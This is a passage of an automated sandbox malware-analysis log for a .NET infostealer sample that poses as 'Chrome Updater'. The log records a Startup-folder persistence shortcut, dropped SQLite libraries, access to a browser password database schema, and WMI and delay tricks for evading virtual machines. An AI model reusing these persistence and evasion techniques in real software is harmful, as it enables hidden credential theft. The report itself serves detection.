        Source: LnSNtO8JIa.exe, 00000000.00000002.3357143512.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LnSNtO8JIa.exe
        Source: LnSNtO8JIa.exe, 00000000.00000002.3371371911.0000000006C32000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs LnSNtO8JIa.exe
        Source: LnSNtO8JIa.exe, 00000000.00000000.2080919793.0000000000672000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSilk.exe0 vs LnSNtO8JIa.exe
        Source: LnSNtO8JIa.exe, 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenameSQLite.Interop.dllF vs LnSNtO8JIa.exe
        Source: LnSNtO8JIa.exeBinary or memory string: OriginalFilenameSilk.exe0 vs LnSNtO8JIa.exe
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/18@4/4
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\Desktop\System.Data.SQLite.dllJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\AppData\Local\Temp\3dd37a12-b018-4e7b-b270-13b167a9df5aJump to behavior
        Source: LnSNtO8JIa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: LnSNtO8JIa.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: LnSNtO8JIa.exe, 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmp, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: LnSNtO8JIa.exe, LnSNtO8JIa.exe, 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmp, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
        Source: LnSNtO8JIa.exe, LnSNtO8JIa.exe, 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmp, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
        Source: LnSNtO8JIa.exe, LnSNtO8JIa.exe, 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmp, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
        Source: LnSNtO8JIa.exe, LnSNtO8JIa.exe, 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmp, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
        Source: LnSNtO8JIa.exe, LnSNtO8JIa.exe, 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmp, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
        Source: LnSNtO8JIa.exeBinary or memory string: CREATE TABLE {0}(x);
        Source: 654fea00-a066-4435-869a-6cdbea15b675.0.dr, d3e95f9e-1e31-40b6-b76d-0afc31d82655.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: LnSNtO8JIa.exe, LnSNtO8JIa.exe, 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmp, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
        Source: LnSNtO8JIa.exeReversingLabs: Detection: 61%
        Source: LnSNtO8JIa.exeString found in binary or memory: /configuration/appSettings/add[@key='{0}']
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile read: C:\Users\user\Desktop\LnSNtO8JIa.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\LnSNtO8JIa.exe C:\Users\user\Desktop\LnSNtO8JIa.exe
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe "C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe"
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
        Source: Chrome Updater.lnk.0.drLNK file: ..\..\..\..\..\Chrome Updater\Chrome.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: LnSNtO8JIa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: LnSNtO8JIa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: LnSNtO8JIa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: Silk.pdb source: LnSNtO8JIa.exe, Chrome.exe.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: System.Data.SQLite.Linq.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: LnSNtO8JIa.exe, LnSNtO8JIa.exe, 00000000.00000002.3371371911.0000000006C32000.00000002.00000001.01000000.00000007.sdmp, System.Data.SQLite.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: SQLite.Interop.dll0.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb| source: LnSNtO8JIa.exe, 00000000.00000002.3371371911.0000000006C32000.00000002.00000001.01000000.00000007.sdmp, System.Data.SQLite.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdbH source: System.Data.SQLite.EF6.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: LnSNtO8JIa.exe, 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmp, SQLite.Interop.dll.0.dr
        Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdb source: System.Data.SQLite.EF6.dll.0.dr
        Source: LnSNtO8JIa.exeStatic PE information: 0x84267492 [Wed Apr 4 00:38:42 2040 UTC]
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3EC940 push ecx; mov dword ptr [esp], 00000000h0_2_6C3EC947
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D1CD6 push ecx; ret 0_2_6C3D1CE9
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_01088711 push es; ret 0_2_01088720
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_01088C80 push es; ret 0_2_01088C90
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeCode function: 5_2_0121C5C2 push esp; retf 5_2_0121C5C9
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeCode function: 5_2_01211F35 push es; retn 9071h5_2_01211F3F
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeJump to dropped file
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\Desktop\System.Data.SQLite.Linq.dllJump to dropped file
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\Desktop\x64\SQLite.Interop.dllJump to dropped file
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\Desktop\x86\SQLite.Interop.dllJump to dropped file
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\Desktop\System.Data.SQLite.EF6.dllJump to dropped file
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\Desktop\System.Data.SQLite.dllJump to dropped file
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnkJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnkJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599891Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599773Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599671Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599559Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599362Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599234Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599125Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 599010Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598906Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598797Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 598682Jump to behavior
